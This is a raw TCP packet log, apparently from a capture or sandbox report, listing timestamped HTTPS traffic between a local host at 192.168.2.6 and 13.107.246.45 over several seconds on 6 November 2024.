Nov 6, 2024 17:03:36.114290953 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.114299059 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.116962910 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.117017031 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.117110968 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.117247105 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.117254019 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.130475044 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.130548000 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.130603075 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.130723953 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.130744934 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.130764008 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.130770922 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.132787943 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.132822990 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.132894039 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.133019924 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.133032084 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.168873072 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.169390917 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.169434071 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.169466972 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.169500113 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.169553041 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.169572115 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.169583082 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.169589043 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.171833992 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.171885014 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.171956062 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.172089100 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.172101974 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.847069979 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.847475052 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.847501040 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.847918987 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.847923994 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.876003981 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.876441956 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.876455069 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.876904011 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.876909018 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.914185047 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.914638042 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.914663076 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.915222883 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.915227890 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.977529049 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.978142023 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.978224993 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.978247881 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.978265047 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.978280067 CET	50196	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.978286028 CET	443	50196	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.980917931 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.980969906 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.981028080 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.981190920 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.981204033 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008599997 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008634090 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008667946 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.008676052 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008687973 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008727074 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.008877993 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.008888006 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.008905888 CET	50197	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.008909941 CET	443	50197	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.011204004 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.011245012 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.011301041 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.011450052 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.011461973 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.045548916 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.045686960 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.045743942 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.045794010 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.045811892 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.045825005 CET	50198	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.045830011 CET	443	50198	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.048172951 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.048223019 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.048305035 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.048439980 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.048455000 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.730073929 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.730600119 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.730617046 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.731029034 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.731035948 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.763550043 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.763964891 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.763989925 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.764319897 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.764326096 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.830326080 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.830967903 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.830990076 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.831403971 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.831408978 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.860955954 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.861000061 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.861041069 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.861093044 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.861120939 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.861354113 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.861370087 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.861382008 CET	50199	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.861388922 CET	443	50199	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.864309072 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.864348888 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.864447117 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.864608049 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.864618063 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.895162106 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.895230055 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.895284891 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.895457029 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.895471096 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.895481110 CET	50200	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.895486116 CET	443	50200	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.897804022 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.897845984 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.897911072 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.898034096 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.898051023 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.974746943 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.974817038 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.974864960 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.974996090 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.975016117 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.975025892 CET	50201	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.975030899 CET	443	50201	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.977444887 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.977483988 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:37.977555990 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.977690935 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:37.977700949 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.552603960 CET	50151	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.554349899 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.554383039 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.554456949 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.554588079 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.554600000 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.605745077 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.606204033 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.606235981 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.606682062 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.606687069 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.660408020 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.660908937 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.660927057 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.661336899 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.661343098 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.719651937 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.720228910 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.720246077 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.720896006 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.720901012 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.740325928 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.740360975 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.740401983 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.740411997 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.740443945 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.740664959 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.740683079 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.740693092 CET	50202	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.740698099 CET	443	50202	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.743592978 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.743622065 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.743691921 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.743866920 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.743880987 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.796003103 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.796076059 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.796139956 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.796309948 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.796323061 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.796334028 CET	50203	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.796339035 CET	443	50203	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.798711061 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.798744917 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.798799992 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.798952103 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.798964977 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.851020098 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.851109028 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.851190090 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.851387978 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.851399899 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.851411104 CET	50204	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.851417065 CET	443	50204	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.853950024 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.853986979 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:38.854072094 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.854217052 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:38.854232073 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.558281898 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.559000015 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.559020996 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.559453964 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.559458971 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.626811028 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.627283096 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.627324104 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.627979040 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.627985001 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.698788881 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.698822021 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.698875904 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.698908091 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.698936939 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.699181080 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.699193954 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.699204922 CET	50207	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.699210882 CET	443	50207	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.702116966 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.702157974 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.702235937 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.702408075 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.702421904 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.760037899 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.760099888 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.760292053 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.760415077 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.760436058 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.760449886 CET	50208	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.760456085 CET	443	50208	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.763309002 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.763334990 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.763438940 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.763607025 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.763617039 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.842904091 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.843393087 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.843406916 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.843950987 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.843955994 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.972759008 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.972815990 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.972948074 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.973295927 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.973295927 CET	50206	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.973309040 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.973335981 CET	443	50206	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.976440907 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.976488113 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:39.976557016 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.976691008 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:39.976705074 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.302544117 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.303154945 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.303174019 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.303591013 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.303596020 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.432054043 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.432794094 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.432807922 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.432965994 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.433125019 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.433130026 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.433166981 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.433209896 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.433212996 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.433264017 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.433432102 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.433444977 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.433454990 CET	50205	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.433460951 CET	443	50205	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.436331987 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.436377048 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.436460018 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.436646938 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.436664104 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.484378099 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.485363007 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.485393047 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.485694885 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.485699892 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.561062098 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.561562061 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.561723948 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.561723948 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.564120054 CET	50209	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.564136028 CET	443	50209	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.564162016 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.564207077 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.564270973 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.564423084 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.564434052 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.613311052 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.613342047 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.613387108 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.613537073 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.613537073 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.613629103 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.613650084 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.613667965 CET	50210	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.613673925 CET	443	50210	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.616147041 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.616192102 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.616286039 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.616466999 CET	50214	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.616482019 CET	443	50214	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.717020988 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.717468977 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.717483997 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.717936993 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.717943907 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.848217964 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.848292112 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.848387957 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.848572969 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.848592043 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.848654985 CET	50211	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.848661900 CET	443	50211	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.851496935 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.851532936 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:40.851609945 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.851748943 CET	50215	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:40.851771116 CET	443	50215	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.193468094 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.193912983 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.193944931 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.194372892 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.194379091 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.303385973 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.303823948 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.303843021 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.304285049 CET	50213	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.304290056 CET	443	50213	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.328773022 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.328852892 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.328918934 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.329061031 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.329087019 CET	443	50212	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:41.329098940 CET	50212	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:41.329103947 CET	443	50212	13.107.246.45	192.168.2.6
